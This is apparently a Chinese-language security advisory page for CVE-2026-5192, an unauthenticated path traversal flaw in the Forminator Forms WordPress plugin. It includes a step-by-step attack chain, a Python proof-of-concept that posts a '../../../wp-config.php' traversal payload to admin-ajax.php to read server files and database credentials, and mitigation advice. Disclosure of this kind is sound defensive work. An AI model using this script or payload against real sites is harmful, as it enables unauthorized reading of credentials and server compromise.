CVE-2026-5192 CVSS 7.5 高危

CVE-2026-5192 Forminator Forms路径遍历漏洞

披露日期: 2026-05-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5192

漏洞类型

路径遍历

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Forminator Forms – Contact Form, Payment Form & Custom Form Builder

漏洞概述

WordPress插件Forminator Forms在1.52.1及之前版本中存在路径遍历漏洞。由于未对特定参数进行严格过滤，未经身份验证的攻击者可利用此漏洞读取服务器上的任意文件。成功利用该漏洞需要目标表单配置了文件上传字段，并启用了“保存并继续”功能及邮件附件通知，攻击者借此可能获取敏感配置信息。

技术细节

该漏洞出现在Forminator插件的文件上传处理逻辑中。当表单配置了“保存并继续”功能并允许在邮件通知中附加文件时，插件会处理`upload-1[file][file_path]`参数。由于代码缺乏对路径遍历字符（如`../`）的有效过滤，攻击者可以操纵该参数来指定服务器上的任意文件路径，而非预期的临时上传目录。尽管需要特定的表单配置条件，但攻击无需用户认证即可发起。一旦利用成功，攻击者能够读取Web服务器上的敏感文件，例如`wp-config.php`（包含数据库凭证），从而导致进一步的服务器入侵风险。CVSS 3.1评分为7.5，主要影响机密性。

攻击链分析

STEP 1

侦察

攻击者扫描目标WordPress站点，识别是否安装了Forminator Forms插件及其版本号（<= 1.52.1）。

STEP 2

配置分析

攻击者寻找公开的表单页面，确认该表单是否包含文件上传字段，并验证是否启用了“保存并继续”及邮件附件功能。

STEP 3

漏洞利用

攻击者向服务器发送特制的POST请求，在`upload-1[file][file_path]`参数中注入路径遍历序列（如`../../wp-config.php`）。

STEP 4

数据获取

服务器读取指定路径的文件内容。攻击者通过直接响应或接收到的通知邮件附件获取敏感文件数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: Forminator Forms < 1.52.1 - Unauthenticated Path Traversal
# Description: Read arbitrary files via upload-1[file][file_path] parameter.

def exploit(url, target_file):
    # Target endpoint usually points to the forminator submission or upload handler
    # Adjust the endpoint based on the specific form ID and configuration
    target_url = f"{url}/wp-admin/admin-ajax.php"
    
    # The payload attempts to read wp-config.php
    data = {
        'action': 'forminator_submit_form_custom_forms', # Action may vary
        'form_id': '1', 
        'current_url': url,
        'upload-1': {
            'file_name': 'exploit.txt',
            'file_path': target_file,  # Path traversal payload, e.g., '../../../wp-config.php'
            'file_size': 1000
        }
    }
    
    # Note: Real exploitation requires matching the specific nonce and form structure
    # if enforced, but this CVE states unauthenticated access under specific conditions.
    try:
        response = requests.post(target_url, data=data)
        if response.status_code == 200:
            print(f"[+] Request sent. Check if file content is leaked in response or email.")
            print(response.text)
    except Exception as e:
        print(f"[-] Error: {e}")

# Usage
# exploit('http://target-site.com', '../../../wp-config.php')

影响范围

Forminator Forms <= 1.52.1

防御指南

临时缓解措施

如果无法立即升级插件，建议临时禁用Forminator插件中的文件上传功能，或者在表单设置中关闭“保存并继续”以及邮件通知附件选项，以阻断漏洞利用路径。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表